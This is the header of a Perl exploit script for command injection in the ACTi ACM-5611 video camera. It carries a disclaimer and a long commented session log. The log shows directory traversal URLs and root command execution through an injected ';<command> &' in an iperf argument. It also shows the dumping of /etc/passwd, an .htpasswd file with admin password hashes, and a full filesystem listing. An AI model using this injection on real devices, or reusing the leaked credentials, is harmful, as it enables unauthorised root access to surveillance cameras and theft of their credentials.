Share
#!/usr/bin/perl  
#  
# ACTi ACM-5611 Video Camera Remote Command Execution Exploit  
#  
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>  
#  
# Firmware Version = A1D-220-V3.08.08-AC  
# Production ID = ACM5611-08G-X-00485  
# Factory Default Type = NTSC, Composite, Two Ways Audio (0x71)  
# Company Name = ACTi Corporation  
# WEB Site = www.acti.com  
# Profile ID = MT9M131-RB0_V080507A  
#  
# Disclaimer:  
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.   
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages   
# caused by direct or indirect use of the information or functionality provided by these programs.   
# The author or any Internet provider bears NO responsibility for content or misuse of these programs   
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,   
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's   
# responsibility.  
#   
# Use them at your own risk!   
#   
# (Dont do anything without permissions)  
#  
# # [ ACTi ACM-5611 Video Camera Remote Command Execution Exploit  
# # [ ============================================================  
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>  
# # [ Server: thttpd/2.25b 29dec2003  
# # [ The target is vulnerable  
# # [  
# # [ Directory Traversal  
# # [ http://192.168.1.1/cgi-bin/./  
# # [ http://192.168.1.1/cgi-bin/../  
# # [ http://192.168.1.1/cgi-bin/80503736  
# # [ http://192.168.1.1/cgi-bin/cmd/  
# # [ http://192.168.1.1/cgi-bin/encoder  
# # [ http://192.168.1.1/cgi-bin/macdev  
# # [ http://192.168.1.1/cgi-bin/mpeg4  
# # [ http://192.168.1.1/cgi-bin/system  
# # [ http://192.168.1.1/cgi-bin/test  
# # [ http://192.168.1.1/cgi-bin/update  
# # [ http://192.168.1.1/cgi-bin/updatem  
# # [ http://192.168.1.1/cgi-bin/url.cgi  
# # [ http://192.168.1.1/cgi-bin/videoconfiguration.cgi  
# # [ http://192.168.1.1/cgi-bin/web1.cgi  
# # [  
# # [ Got root?  
# # [ # id  
# # [ execute : /sbin/iperf -c ;id &  
# # [ uid=0(root) gid=0(root)  
# # [ # ls -la  
# # [ execute : /sbin/iperf -c ;ls -la &  
# # [ -rwxr-xr-x 1 0 0 211088 web1.cgi  
# # [ -rwxr-xr-x 1 0 0 106124 encoder  
# # [ -rwxr-xr-x 1 0 0 54084 test  
# # [ -rwxr-xr-x 1 0 0 79756 mpeg4  
# # [ -rwxr-xr-x 1 0 0 89604 system  
# # [ -rwxr-xr-x 1 0 0 21592 macdev  
# # [ -rwxr-xr-x 1 0 0 57504 updatem  
# # [ -rwxr-xr-x 1 0 0 58560 update  
# # [ lrwxrwxrwx 1 0 0 8 videoconfiguration.cgi -> web1.cgi  
# # [ lrwxrwxrwx 1 0 0 6 url.cgi -> system  
# # [ -rwxr-xr-x 1 0 0 52888 80503736  
# # [ drwxr-xr-x 2 0 0 1024 cmd  
# # [ drwxr-xr-x 5 0 0 1024 ..  
# # [ drw-r--r-- 3 0 0 1024 .  
# # [ # ls -la /var/log/   
# # [ execute : /sbin/iperf -c ;ls -la /var/log/ &  
# # [ -rw-r--r-- 1 0 0 259 system_info_url.txt  
# # [ -rw-r--r-- 1 0 0 259 system_info_web.txt  
# # [ -rw-r--r-- 1 0 0 82 wan_info_brief.txt  
# # [ -rw-r--r-- 1 0 0 455 systemlog.txt  
# # [ drwxr-xr-x 5 0 0 1024 ..  
# # [ drwxr-xr-x 2 0 0 1024 .  
# # [ # cat /etc/passwd  
# # [ execute : /sbin/iperf -c ;cat /etc/passwd &  
# # [ root::0:0:root:/root:/bin/bash  
# # [ bin:*:1:1:bin:/bin:  
# # [ daemon:*:2:2:daemon:/usr/sbin:  
# # [ sys:*:3:3:sys:/dev:  
# # [ adm:*:4:4:adm:/var/adm:  
# # [ lp:*:5:7:lp:/var/spool/lpd:  
# # [ sync:*:6:8:sync:/bin:/bin/sync  
# # [ shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown  
# # [ halt:*:8:10:halt:/sbin:/sbin/halt  
# # [ mail:*:9:11:mail:/var/spool/mail:  
# # [ news:*:10:12:news:/var/spool/news:  
# # [ uucp:*:11:13:uucp:/var/spool/uucp:  
# # [ operator:*:12:0:operator:/root:  
# # [ games:*:13:100:games:/usr/games:  
# # [ ftp:*:15:14:ftp:/var/ftp:  
# # [ man:*:16:100:man:/var/cache/man:  
# # [ nobody:*:65534:65534:nobody:/home:/bin/sh  
# # [ # cat cmd/.htpasswd  
# # [ execute : /sbin/iperf -c ;cat cmd/.htpasswd &  
# # [ admin:dUHDw321YSAkP  
# # [ Admin:dUHDw321YSAkP  
# # [ # find / -type f  
# # [ execute : /sbin/iperf -c ;find / -type f &  
# # [ /bin/busybox  
# # [ /etc/fstab  
# # [ /etc/thttpd/thttpd.conf  
# # [ /etc/thttpd/thttpd.throttles  
# # [ /etc/services  
# # [ /etc/resolv.conf  
# # [ /etc/profile  
# # [ /etc/init.d/rcS  
# # [ /etc/init.d/bootstrap  
# # [ /etc/init.d/oem_load  
# # [ /etc/init.d/system_load  
# # [ /etc/init.d/thttpd  
# # [ /etc/init.d/daemon_manager  
# # [ /etc/init.d/modules  
# # [ /etc/init.d/ddns  
# # [ /etc/init.d/syslog  
# # [ /etc/init.d/hostname  
# # [ /etc/init.d/set_port_speed  
# # [ /etc/init.d/get_wan_config  
# # [ /etc/init.d/myserver  
# # [ /etc/init.d/wan  
# # [ /etc/init.d/datetime  
# # [ /etc/init.d/dns  
# # [ /etc/init.d/boot_sync  
# # [ /etc/init.d/profile_load  
# # [ /etc/init.d/datetime_rackmount  
# # [ /etc/group  
# # [ /etc/passwd  
# # [ /etc/host.conf  
# # [ /etc/inittab  
# # [ /etc/ppp/plugins/rp-pppoe.so  
# # [ /etc/ppp/resolv.conf  
# # [ /etc/ppp/ip-down  
# # [ /etc/ppp/ip-up  
# # [ /etc/protocols  
# # [ /etc/config/update.conf  
# # [ /etc/default/default.conf  
# # [ /etc/default/version  
# # [ /etc/default/default.pppoe  
# # [ /etc/default/build_date  
# # [ /etc/default/global_options  
# # [ /etc/default/boot_version  
# # [ /etc/default/profile/camera.bin  
# # [ /etc/default/profile/firmware.bin  
# # [ /etc/default/profile/profile_id  
# # [ /etc/default/profile/NameMap  
# # [ /etc/default/profile/camera_adj.bin  
# # [ /etc/default/profile/fw_cap.bin  
# # [ /etc/default/model  
# # [ /etc/default/fw_type  
# # [ /etc/default/device  
# # [ /etc/default/mac  
# # [ /etc/default/serial  
# # [ /etc/default/property  
# # [ /etc/hosts  
# # [ /lib/ld-uClibc-0.9.15.so  
# # [ /lib/libcrypt-0.9.15.so  
# # [ /lib/libdl-0.9.15.so  
# # [ /lib/libm-0.9.15.so  
# # [ /lib/libpthread-0.9.15.so  
# # [ /lib/libresolv-0.9.15.so  
# # [ /lib/libuClibc-0.9.15.so  
# # [ /lib/libutil-0.9.15.so  
# # [ /lib/modules/2.4.19-rmk4/acap_drv.o  
# # [ /lib/modules/2.4.19-rmk4/ds1339_rtc.o  
# # [ /lib/modules/2.4.19-rmk4/sound_drv.o  
# # [ /proc/mtd  
# # [ /proc/asoc2200_eth/DATA  
# # [ /proc/misc  
# # [ /proc/cpu/alignment  
# # [ /proc/tty/drivers  
# # [ /proc/tty/ldiscs  
# # [ /proc/tty/driver/serial  
# # [ /proc/sys/abi/fake_utsname  
# # [ /proc/sys/abi/trace  
# # [ /proc/sys/abi/defhandler_libcso  
# # [ /proc/sys/abi/defhandler_lcall7  
# # [ /proc/sys/abi/defhandler_elf  
# # [ /proc/sys/abi/defhandler_coff  
# # [ /proc/sys/fs/lease-break-time  
# # [ /proc/sys/fs/dir-notify-enable  
# # [ /proc/sys/fs/leases-enable  
# # [ /proc/sys/fs/overflowgid  
# # [ /proc/sys/fs/overflowuid  
# # [ /proc/sys/fs/dentry-state  
# # [ /proc/sys/fs/dquot-nr  
# # [ /proc/sys/fs/file-max  
# # [ /proc/sys/fs/file-nr  
# # [ /proc/sys/fs/inode-state  
# # [ /proc/sys/fs/inode-nr  
# # [ /proc/sys/net/unix/max_dgram_qlen  
# # [ /proc/sys/net/ipv4/conf/eth0/arp_filter  
# # [ /proc/sys/net/ipv4/conf/eth0/tag  
# # [ /proc/sys/net/ipv4/conf/eth0/log_martians  
# # [ /proc/sys/net/ipv4/conf/eth0/bootp_relay  
# # [ /proc/sys/net/ipv4/conf/eth0/medium_id  
# # [ /proc/sys/net/ipv4/conf/eth0/proxy_arp  
# # [ /proc/sys/net/ipv4/conf/eth0/accept_source_route  
# # [ /proc/sys/net/ipv4/conf/eth0/send_redirects  
# # [ /proc/sys/net/ipv4/conf/eth0/rp_filter  
# # [ /proc/sys/net/ipv4/conf/eth0/shared_media  
# # [ /proc/sys/net/ipv4/conf/eth0/secure_redirects  
# # [ /proc/sys/net/ipv4/conf/eth0/accept_redirects  
# # [ /proc/sys/net/ipv4/conf/eth0/mc_forwarding  
# # [ /proc/sys/net/ipv4/conf/eth0/forwarding  
# # [ /proc/sys/net/ipv4/conf/default/arp_filter  
# # [ /proc/sys/net/ipv4/conf/default/tag  
# # [ /proc/sys/net/ipv4/conf/default/log_martians  
# # [ /proc/sys/net/ipv4/conf/default/bootp_relay  
# # [ /proc/sys/net/ipv4/conf/default/medium_id  
# # [ /proc/sys/net/ipv4/conf/default/proxy_arp  
# # [ /proc/sys/net/ipv4/conf/default/accept_source_route  
# # [ /proc/sys/net/ipv4/conf/default/send_redirects  
# # [ /proc/sys/net/ipv4/conf/default/rp_filter  
# # [ /proc/sys/net/ipv4/conf/default/shared_media  
# # [ /proc/sys/net/ipv4/conf/default/secure_redirects  
# # [ /proc/sys/net/ipv4/conf/default/accept_redirects  
# # [ /proc/sys/net/ipv4/conf/default/mc_forwarding  
# # [ /proc/sys/net/ipv4/conf/default/forwarding  
# # [ /proc/sys/net/ipv4/conf/all/arp_filter  
# # [ /proc/sys/net/ipv4/conf/all/tag  
# # [ /proc/sys/net/ipv4/conf/all/log_martians  
# # [ /proc/sys/net/ipv4/conf/all/bootp_relay  
# # [ /proc/sys/net/ipv4/conf/all/medium_id  
# # [ /proc/sys/net/ipv4/conf/all/proxy_arp  
# # [ /proc/sys/net/ipv4/conf/all/accept_source_route  
# # [ /proc/sys/net/ipv4/conf/all/send_redirects  
# # [ /proc/sys/net/ipv4/conf/all/rp_filter  
# # [ /proc/sys/net/ipv4/conf/all/shared_media  
# # [ /proc/sys/net/ipv4/conf/all/secure_redirects  
# # [ /proc/sys/net/ipv4/conf/all/accept_redirects  
# # [ /proc/sys/net/ipv4/conf/all/mc_forwarding  
# # [ /proc/sys/net/ipv4/conf/all/forwarding  
# # [ /proc/sys/net/ipv4/neigh/eth0/locktime  
# # [ /proc/sys/net/ipv4/neigh/eth0/proxy_delay  
# # [ /proc/sys/net/ipv4/neigh/eth0/anycast_delay  
# # [ /proc/sys/net/ipv4/neigh/eth0/proxy_qlen  
# # [ /proc/sys/net/ipv4/neigh/eth0/unres_qlen  
# # [ /proc/sys/net/ipv4/neigh/eth0/gc_stale_time  
# # [ /proc/sys/net/ipv4/neigh/eth0/delay_first_probe_time  
# # [ /proc/sys/net/ipv4/neigh/eth0/base_reachable_time  
# # [ /proc/sys/net/ipv4/neigh/eth0/retrans_time  
# # [ /proc/sys/net/ipv4/neigh/eth0/app_solicit  
# # [ /proc/sys/net/ipv4/neigh/eth0/ucast_solicit  
# # [ /proc/sys/net/ipv4/neigh/eth0/mcast_solicit  
# # [ /proc/sys/net/ipv4/neigh/default/gc_thresh3  
# # [ /proc/sys/net/ipv4/neigh/default/gc_thresh2  
# # [ /proc/sys/net/ipv4/neigh/default/gc_thresh1  
# # [ /proc/sys/net/ipv4/neigh/default/gc_interval  
# # [ /proc/sys/net/ipv4/neigh/default/locktime  
# # [ /proc/sys/net/ipv4/neigh/default/proxy_delay  
# # [ /proc/sys/net/ipv4/neigh/default/anycast_delay  
# # [ /proc/sys/net/ipv4/neigh/default/proxy_qlen  
# # [ /proc/sys/net/ipv4/neigh/default/unres_qlen  
# # [ /proc/sys/net/ipv4/neigh/default/gc_stale_time  
# # [ /proc/sys/net/ipv4/neigh/default/delay_first_probe_time  
# # [ /proc/sys/net/ipv4/neigh/default/base_reachable_time  
# # [ /proc/sys/net/ipv4/neigh/default/retrans_time  
# # [ /proc/sys/net/ipv4/neigh/default/app_solicit  
# # [ /proc/sys/net/ipv4/neigh/default/ucast_solicit  
# # [ /proc/sys/net/ipv4/neigh/default/mcast_solicit  
# # [ /proc/sys/net/ipv4/tcp_tw_reuse  
# # [ /proc/sys/net/ipv4/icmp_ratemask  
# # [ /proc/sys/net/ipv4/icmp_ratelimit  
# # [ /proc/sys/net/ipv4/tcp_adv_win_scale  
# # [ /proc/sys/net/ipv4/tcp_app_win  
# # [ /proc/sys/net/ipv4/tcp_rmem  
# # [ /proc/sys/net/ipv4/tcp_wmem  
# # [ /proc/sys/net/ipv4/tcp_mem  
# # [ /proc/sys/net/ipv4/tcp_dsack  
# # [ /proc/sys/net/ipv4/tcp_ecn  
# # [ /proc/sys/net/ipv4/tcp_reordering  
# # [ /proc/sys/net/ipv4/tcp_fack  
# # [ /proc/sys/net/ipv4/tcp_orphan_retries  
# # [ /proc/sys/net/ipv4/inet_peer_gc_maxtime  
# # [ /proc/sys/net/ipv4/inet_peer_gc_mintime  
# # [ /proc/sys/net/ipv4/inet_peer_maxttl  
# # [ /proc/sys/net/ipv4/inet_peer_minttl  
# # [ /proc/sys/net/ipv4/inet_peer_threshold  
# # [ /proc/sys/net/ipv4/route/min_adv_mss  
# # [ /proc/sys/net/ipv4/route/min_pmtu  
# # [ /proc/sys/net/ipv4/route/mtu_expires  
# # [ /proc/sys/net/ipv4/route/gc_elasticity  
# # [ /proc/sys/net/ipv4/route/error_burst  
# # [ /proc/sys/net/ipv4/route/error_cost  
# # [ /proc/sys/net/ipv4/route/redirect_silence  
# # [ /proc/sys/net/ipv4/route/redirect_number  
# # [ /proc/sys/net/ipv4/route/redirect_load  
# # [ /proc/sys/net/ipv4/route/gc_interval  
# # [ /proc/sys/net/ipv4/route/gc_timeout  
# # [ /proc/sys/net/ipv4/route/gc_min_interval  
# # [ /proc/sys/net/ipv4/route/max_size  
# # [ /proc/sys/net/ipv4/route/gc_thresh  
# # [ /proc/sys/net/ipv4/route/max_delay  
# # [ /proc/sys/net/ipv4/route/min_delay  
# # [ /proc/sys/net/ipv4/route/flush  
# # [ /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses  
# # [ /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts  
# # [ /proc/sys/net/ipv4/icmp_echo_ignore_all  
# # [ /proc/sys/net/ipv4/ip_local_port_range  
# # [ /proc/sys/net/ipv4/tcp_max_syn_backlog  
# # [ /proc/sys/net/ipv4/tcp_rfc1337  
# # [ /proc/sys/net/ipv4/tcp_stdurg  
# # [ /proc/sys/net/ipv4/tcp_abort_on_overflow  
# # [ /proc/sys/net/ipv4/tcp_tw_recycle  
# # [ /proc/sys/net/ipv4/tcp_fin_timeout  
# # [ /proc/sys/net/ipv4/tcp_retries2  
# # [ /proc/sys/net/ipv4/tcp_retries1  
# # [ /proc/sys/net/ipv4/tcp_keepalive_intvl  
# # [ /proc/sys/net/ipv4/tcp_keepalive_probes  
# # [ /proc/sys/net/ipv4/tcp_keepalive_time  
# # [ /proc/sys/net/ipv4/ipfrag_time  
# # [ /proc/sys/net/ipv4/ip_dynaddr  
# # [ /proc/sys/net/ipv4/ipfrag_low_thresh  
# # [ /proc/sys/net/ipv4/ipfrag_high_thresh  
# # [ /proc/sys/net/ipv4/tcp_max_tw_buckets  
# # [ /proc/sys/net/ipv4/tcp_max_orphans  
# # [ /proc/sys/net/ipv4/tcp_synack_retries  
# # [ /proc/sys/net/ipv4/tcp_syn_retries  
# # [ /proc/sys/net/ipv4/ip_nonlocal_bind  
# # [ /proc/sys/net/ipv4/ip_no_pmtu_disc  
# # [ /proc/sys/net/ipv4/ip_autoconfig  
# # [ /proc/sys/net/ipv4/ip_default_ttl  
# # [ /proc/sys/net/ipv4/ip_forward  
# # [ /proc/sys/net/ipv4/tcp_retrans_collapse  
# # [ /proc/sys/net/ipv4/tcp_sack  
# # [ /proc/sys/net/ipv4/tcp_window_scaling  
# # [ /proc/sys/net/ipv4/tcp_timestamps  
# # [ /proc/sys/net/core/hot_list_length  
# # [ /proc/sys/net/core/optmem_max  
# # [ /proc/sys/net/core/message_burst  
# # [ /proc/sys/net/core/message_cost  
# # [ /proc/sys/net/core/mod_cong  
# # [ /proc/sys/net/core/lo_cong  
# # [ /proc/sys/net/core/no_cong  
# # [ /proc/sys/net/core/no_cong_thresh  
# # [ /proc/sys/net/core/netdev_max_backlog  
# # [ /proc/sys/net/core/rmem_default  
# # [ /proc/sys/net/core/wmem_default  
# # [ /proc/sys/net/core/rmem_max  
# # [ /proc/sys/net/core/wmem_max  
# # [ /proc/sys/vm/max_map_count  
# # [ /proc/sys/vm/max-readahead  
# # [ /proc/sys/vm/min-readahead  
# # [ /proc/sys/vm/page-cluster  
# # [ /proc/sys/vm/pagetable_cache  
# # [ /proc/sys/vm/kswapd  
# # [ /proc/sys/vm/overcommit_memory  
# # [ /proc/sys/vm/bdflush  
# # [ /proc/sys/kernel/overflowgid  
# # [ /proc/sys/kernel/overflowuid  
# # [ /proc/sys/kernel/random/uuid  
# # [ /proc/sys/kernel/random/boot_id  
# # [ /proc/sys/kernel/random/write_wakeup_threshold  
# # [ /proc/sys/kernel/random/read_wakeup_threshold  
# # [ /proc/sys/kernel/random/entropy_avail  
# # [ /proc/sys/kernel/random/poolsize  
# # [ /proc/sys/kernel/threads-max  
# # [ /proc/sys/kernel/cad_pid  
# # [ /proc/sys/kernel/sem  
# # [ /proc/sys/kernel/msgmnb  
# # [ /proc/sys/kernel/msgmni  
# # [ /proc/sys/kernel/msgmax  
# # [ /proc/sys/kernel/shmmni  
# # [ /proc/sys/kernel/shmall  
# # [ /proc/sys/kernel/shmmax  
# # [ /proc/sys/kernel/rtsig-max  
# # [ /proc/sys/kernel/rtsig-nr  
# # [ /proc/sys/kernel/printk  
# # [ /proc/sys/kernel/ctrl-alt-del  
# # [ /proc/sys/kernel/real-root-dev  
# # [ /proc/sys/kernel/cap-bound  
# # [ /proc/sys/kernel/tainted  
# # [ /proc/sys/kernel/core_uses_pid  
# # [ /proc/sys/kernel/panic  
# # [ /proc/sys/kernel/domainname  
# # [ /proc/sys/kernel/hostname  
# # [ /proc/sys/kernel/version  
# # [ /proc/sys/kernel/osrelease  
# # [ /proc/sys/kernel/ostype  
# # [ /proc/sysvipc/shm  
# # [ /proc/sysvipc/msg  
# # [ /proc/sysvipc/sem  
# # [ /proc/net/packet  
# # [ /proc/net/unix  
# # [ /proc/net/udp  
# # [ /proc/net/tcp  
# # [ /proc/net/sockstat  
# # [ /proc/net/snmp  
# # [ /proc/net/netstat  
# # [ /proc/net/raw  
# # [ /proc/net/rt_cache_stat  
# # [ /proc/net/rt_cache  
# # [ /proc/net/route  
# # [ /proc/net/arp  
# # [ /proc/net/netlink  
# # [ /proc/net/pppoe  
# # [ /proc/net/dev_mcast  
# # [ /proc/net/softnet_stat  
# # [ /proc/net/dev  
# # [ /proc/kcore  
# # [ /proc/ksyms  
# # [ /proc/slabinfo  
# # [ /proc/cpuinfo  
# # [ /proc/kmsg  
# # [ /proc/execdomains  
# # [ /proc/iomem  
# # [ /proc/swaps  
# # [ /proc/locks  
# # [ /proc/cmdline  
# # [ /proc/ioports  
# # [ /proc/filesystems  
# # [ /proc/interrupts  
# # [ /proc/partitions  
# # [ /proc/devices  
# # [ /proc/stat  
# # [ /proc/modules  
# # [ /proc/version  
# # [ /proc/meminfo  
# # [ /proc/uptime  
# # [ /proc/loadavg  
# # [ /proc/1/environ  
# # [ /proc/1/status  
# # [ /proc/1/cmdline  
# # [ /proc/1/stat  
# # [ /proc/1/statm  
# # [ /proc/1/maps  
# # [ /proc/1/mem  
# # [ /proc/1/mounts  
# # [ /proc/2/environ  
# # [ /proc/2/status  
# # [ /proc/2/cmdline  
# # [ /proc/2/stat  
# # [ /proc/2/statm  
# # [ /proc/2/maps  
# # [ /proc/2/mem  
# # [ /proc/2/mounts  
# # [ /proc/3/environ  
# # [ /proc/3/status  
# # [ /proc/3/cmdline  
# # [ /proc/3/stat  
# # [ /proc/3/statm  
# # [ /proc/3/maps  
# # [ /proc/3/mem  
# # [ /proc/3/mounts  
# # [ /proc/4/environ  
# # [ /proc/4/status  
# # [ /proc/4/cmdline  
# # [ /proc/4/stat  
# # [ /proc/4/statm  
# # [ /proc/4/maps  
# # [ /proc/4/mem  
# # [ /proc/4/mounts  
# # [ /proc/5/environ  
# # [ /proc/5/status  
# # [ /proc/5/cmdline  
# # [ /proc/5/stat  
# # [ /proc/5/statm  
# # [ /proc/5/maps  
# # [ /proc/5/mem  
# # [ /proc/5/mounts  
# # [ /proc/6/environ  
# # [ /proc/6/status  
# # [ /proc/6/cmdline  
# # [ /proc/6/stat  
# # [ /proc/6/statm  
# # [ /proc/6/maps  
# # [ /proc/6/mem  
# # [ /proc/6/mounts  
# # [ find: /proc/7/fd: No such file or directory  
# # [ /proc/7/environ  
# # [ /proc/7/status  
# # [ /proc/7/cmdline  
# # [ /proc/7/stat  
# # [ /proc/7/statm  
# # [ /proc/7/maps  
# # [ /proc/7/mem  
# # [ /proc/7/mounts  
# # [ /proc/14/environ  
# # [ /proc/14/status  
# # [ /proc/14/cmdline  
# # [ /proc/14/stat  
# # [ /proc/14/statm  
# # [ /proc/14/maps  
# # [ /proc/14/mem  
# # [ /proc/14/mounts  
# # [ /proc/132/environ  
# # [ /proc/132/status  
# # [ /proc/132/cmdline  
# # [ /proc/132/stat  
# # [ /proc/132/statm  
# # [ /proc/132/maps  
# # [ /proc/132/mem  
# # [ /proc/132/mounts  
# # [ /proc/142/environ  
# # [ /proc/142/status  
# # [ /proc/142/cmdline  
# # [ /proc/142/stat  
# # [ /proc/142/statm  
# # [ /proc/142/maps  
# # [ /proc/142/mem  
# # [ /proc/142/mounts  
# # [ /proc/153/environ  
# # [ /proc/153/status  
# # [ /proc/153/cmdline  
# # [ /proc/153/stat  
# # [ /proc/153/statm  
# # [ /proc/153/maps  
# # [ /proc/153/mem  
# # [ /proc/153/mounts  
# # [ /proc/154/environ  
# # [ /proc/154/status  
# # [ /proc/154/cmdline  
# # [ /proc/154/stat  
# # [ /proc/154/statm  
# # [ /proc/154/maps  
# # [ /proc/154/mem  
# # [ /proc/154/mounts  
# # [ /proc/157/environ  
# # [ /proc/157/status  
# # [ /proc/157/cmdline  
# # [ /proc/157/stat  
# # [ /proc/157/statm  
# # [ /proc/157/maps  
# # [ /proc/157/mem  
# # [ /proc/157/mounts  
# # [ /proc/164/environ  
# # [ /proc/164/status  
# # [ /proc/164/cmdline  
# # [ /proc/164/stat  
# # [ /proc/164/statm  
# # [ /proc/164/maps  
# # [ /proc/164/mem  
# # [ /proc/164/mounts  
# # [ /proc/171/environ  
# # [ /proc/171/status  
# # [ /proc/171/cmdline  
# # [ /proc/171/stat  
# # [ /proc/171/statm  
# # [ /proc/171/maps  
# # [ /proc/171/mem  
# # [ /proc/171/mounts  
# # [ /proc/172/environ  
# # [ /proc/172/status  
# # [ /proc/172/cmdline  
# # [ /proc/172/stat  
# # [ /proc/172/statm  
# # [ /proc/172/maps  
# # [ /proc/172/mem  
# # [ /proc/172/mounts  
# # [ /proc/173/environ  
# # [ /proc/173/status  
# # [ /proc/173/cmdline  
# # [ /proc/173/stat  
# # [ /proc/173/statm  
# # [ /proc/173/maps  
# # [ /proc/173/mem  
# # [ /proc/173/mounts  
# # [ /proc/174/environ  
# # [ /proc/174/status  
# # [ /proc/174/cmdline  
# # [ /proc/174/stat  
# # [ /proc/174/statm  
# # [ /proc/174/maps  
# # [ /proc/174/mem  
# # [ /proc/174/mounts  
# # [ /proc/175/environ  
# # [ /proc/175/status  
# # [ /proc/175/cmdline  
# # [ /proc/175/stat  
# # [ /proc/175/statm  
# # [ /proc/175/maps  
# # [ /proc/175/mem  
# # [ /proc/175/mounts  
# # [ /proc/16706/environ  
# # [ /proc/16706/status  
# # [ /proc/16706/cmdline  
# # [ /proc/16706/stat  
# # [ /proc/16706/statm  
# # [ /proc/16706/maps  
# # [ /proc/16706/mem  
# # [ /proc/16706/mounts  
# # [ /proc/16707/environ  
# # [ /proc/16707/status  
# # [ /proc/16707/cmdline  
# # [ /proc/16707/stat  
# # [ /proc/16707/statm  
# # [ /proc/16707/maps  
# # [ /proc/16707/mem  
# # [ /proc/16707/mounts  
# # [ /proc/16708/environ  
# # [ /proc/16708/status  
# # [ /proc/16708/cmdline  
# # [ /proc/16708/stat  
# # [ /proc/16708/statm  
# # [ /proc/16708/maps  
# # [ /proc/16708/mem  
# # [ /proc/16708/mounts  
# # [ /proc/16709/environ  
# # [ /proc/16709/status  
# # [ /proc/16709/cmdline  
# # [ /proc/16709/stat  
# # [ /proc/16709/statm  
# # [ /proc/16709/maps  
# # [ /proc/16709/mem  
# # [ /proc/16709/mounts  
# # [ /proc/26139/environ  
# # [ /proc/26139/status  
# # [ /proc/26139/cmdline  
# # [ /proc/26139/stat  
# # [ /proc/26139/statm  
# # [ /proc/26139/maps  
# # [ /proc/26139/mem  
# # [ /proc/26139/mounts  
# # [ /proc/29140/environ  
# # [ /proc/29140/status  
# # [ /proc/29140/cmdline  
# # [ /proc/29140/stat  
# # [ /proc/29140/statm  
# # [ /proc/29140/maps  
# # [ /proc/29140/mem  
# # [ /proc/29140/mounts  
# # [ /proc/29176/environ  
# # [ /proc/29176/status  
# # [ /proc/29176/cmdline  
# # [ /proc/29176/stat  
# # [ /proc/29176/statm  
# # [ /proc/29176/maps  
# # [ /proc/29176/mem  
# # [ /proc/29176/mounts  
# # [ /proc/7727/environ  
# # [ /proc/7727/status  
# # [ /proc/7727/cmdline  
# # [ /proc/7727/stat  
# # [ /proc/7727/statm  
# # [ /proc/7727/maps  
# # [ /proc/7727/mem  
# # [ /proc/7727/mounts  
# # [ /proc/7728/environ  
# # [ /proc/7728/status  
# # [ /proc/7728/cmdline  
# # [ /proc/7728/stat  
# # [ /proc/7728/statm  
# # [ /proc/7728/maps  
# # [ /proc/7728/mem  
# # [ /proc/7728/mounts  
# # [ /proc/7729/environ  
# # [ /proc/7729/status  
# # [ /proc/7729/cmdline  
# # [ /proc/7729/stat  
# # [ /proc/7729/statm  
# # [ /proc/7729/maps  
# # [ /proc/7729/mem  
# # [ /proc/7729/mounts  
# # [ /proc/23419/environ  
# # [ /proc/23419/status  
# # [ /proc/23419/cmdline  
# # [ /proc/23419/stat  
# # [ /proc/23419/statm  
# # [ /proc/23419/maps  
# # [ /proc/23419/mem  
# # [ /proc/23419/mounts  
# # [ /proc/14789/environ  
# # [ /proc/14789/status  
# # [ /proc/14789/cmdline  
# # [ /proc/14789/stat  
# # [ /proc/14789/statm  
# # [ /proc/14789/maps  
# # [ /proc/14789/mem  
# # [ /proc/14789/mounts  
# # [ /proc/14790/environ  
# # [ /proc/14790/status  
# # [ /proc/14790/cmdline  
# # [ /proc/14790/stat  
# # [ /proc/14790/statm  
# # [ /proc/14790/maps  
# # [ /proc/14790/mem  
# # [ /proc/14790/mounts  
# # [ /proc/14791/environ  
# # [ /proc/14791/status  
# # [ /proc/14791/cmdline  
# # [ /proc/14791/stat  
# # [ /proc/14791/statm  
# # [ /proc/14791/maps  
# # [ /proc/14791/mem  
# # [ /proc/14791/mounts  
# # [ /proc/16682/environ  
# # [ /proc/16682/status  
# # [ /proc/16682/cmdline  
# # [ /proc/16682/stat  
# # [ /proc/16682/statm  
# # [ /proc/16682/maps  
# # [ /proc/16682/mem  
# # [ /proc/16682/mounts  
# # [ /proc/22978/environ  
# # [ /proc/22978/status  
# # [ /proc/22978/cmdline  
# # [ /proc/22978/stat  
# # [ /proc/22978/statm  
# # [ /proc/22978/maps  
# # [ /proc/22978/mem  
# # [ /proc/22978/mounts  
# # [ /proc/22979/environ  
# # [ /proc/22979/status  
# # [ /proc/22979/cmdline  
# # [ /proc/22979/stat  
# # [ /proc/22979/statm  
# # [ /proc/22979/maps  
# # [ /proc/22979/mem  
# # [ /proc/22979/mounts  
# # [ /proc/27240/environ  
# # [ /proc/27240/status  
# # [ /proc/27240/cmdline  
# # [ /proc/27240/stat  
# # [ /proc/27240/statm  
# # [ /proc/27240/maps  
# # [ /proc/27240/mem  
# # [ /proc/27240/mounts  
# # [ /proc/27241/environ  
# # [ /proc/27241/status  
# # [ /proc/27241/cmdline  
# # [ /proc/27241/stat  
# # [ /proc/27241/statm  
# # [ /proc/27241/maps  
# # [ /proc/27241/mem  
# # [ /proc/27241/mounts  
# # [ /proc/20414/environ  
# # [ /proc/20414/status  
# # [ /proc/20414/cmdline  
# # [ /proc/20414/stat  
# # [ /proc/20414/statm  
# # [ /proc/20414/maps  
# # [ /proc/20414/mem  
# # [ /proc/20414/mounts  
# # [ /proc/9117/environ  
# # [ /proc/9117/status  
# # [ /proc/9117/cmdline  
# # [ /proc/9117/stat  
# # [ /proc/9117/statm  
# # [ /proc/9117/maps  
# # [ /proc/9117/mem  
# # [ /proc/9117/mounts  
# # [ /proc/9120/environ  
# # [ /proc/9120/status  
# # [ /proc/9120/cmdline  
# # [ /proc/9120/stat  
# # [ /proc/9120/statm  
# # [ /proc/9120/maps  
# # [ /proc/9120/mem  
# # [ /proc/9120/mounts  
# # [ /sbin/dhcpcd  
# # [ /sbin/ez-ipupdate  
# # [ /sbin/htpasswd  
# # [ /sbin/iperf  
# # [ /sbin/thttpd  
# # [ /usr/sbin/mount_nfs_drive  
# # [ /usr/sbin/ll  
# # [ /usr/sbin/system_info  
# # [ /usr/sbin/read_dev_info  
# # [ /usr/sbin/acti_config  
